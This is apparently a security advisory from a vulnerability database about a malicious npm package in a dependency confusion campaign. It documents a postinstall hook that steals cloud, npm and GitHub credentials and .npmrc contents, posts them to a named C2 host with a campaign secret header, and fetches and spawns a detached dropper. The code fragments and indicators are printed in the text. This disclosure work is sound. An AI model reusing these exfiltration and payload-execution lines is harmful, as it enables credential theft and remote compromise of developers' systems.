VDB
GCVE-110-OSM-2026-4741
GCVE-110-OSM-2026-4741
Advisory PublishedCVSS 9.6/10
Exfiltrates AWS credentials, npm tokens, GitHub tokens, and .npmrc file contents to attacker-controlled C2 at oob.moika.tech, then downloads and executes an OS-specific dropper at postinstall time. Part of the confirmed bcs-bank dependency confusion campaign: the postinstall hook harvests all sensitive environment variables (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, NPM_TOKEN, GITHUB_TOKEN, and 7 others) and .npmrc files from four filesystem locations, posts them as JSON to https://oob.moika.tech/report with campaign secret X-Secret: l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1, then fetches and executes an OS-specific dropper from https://oob.moika.tech/payload/{mac|win|linux} as a detached background process.
**Trigger** (`postinstall`): executes `node scripts/postinstall.js` at install time.
**Credential collection**: iterates all `process.env` entries for keys matching `npm_token`, `npm_config_authtoken`, `npm_config__auth`, `github_token`, `aws_access_key_id`, `aws_secret_access_key`, `aws_session_token`, `artifactory_token`, `nexus_token`, `node_auth_token`.
**File access**: reads first 15 lines of `.npmrc` from `~/.npmrc`, `/etc/npmrc`, `<cwd>/.npmrc`, and `<cwd>/../.npmrc`.
**System fingerprint**: collects hostname, username, platform, arch, node version, npm version, cwd, default npm registry.
**CI detection**: reads `process.env.GITHUB_ACTIONS`, `JENKINS_URL`, `GITLAB_CI`.
**Exfiltration**: HTTP POST to `https://oob.moika.tech/report` with `X-Secret: l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1` header containing all collected data as JSON.
**Payload delivery**: `httpGet('https://oob.moika.tech/payload/{mac|win|linux}')` → writes to temp file → `spawn('/bin/sh', [tmp], { detached: true, stdio: 'ignore' }).unref()` (Linux/macOS) or `spawn('cmd.exe', ['/c', tmp], { detached: true, windowsHide: true }).unref()` (Windows). Stage-2 payloads confirmed for campaign siblings: macOS = `._kworker` + `universald` (LaunchAgent persistence agent), Windows = `WinUpdate.exe` (Tauri RAT).
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | @service-user-notifications/set_refresh_interval | 9.9.10 (affected) | — |
Browse GCVE Records
73,442 records in the GCVE database · Updated July 17, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.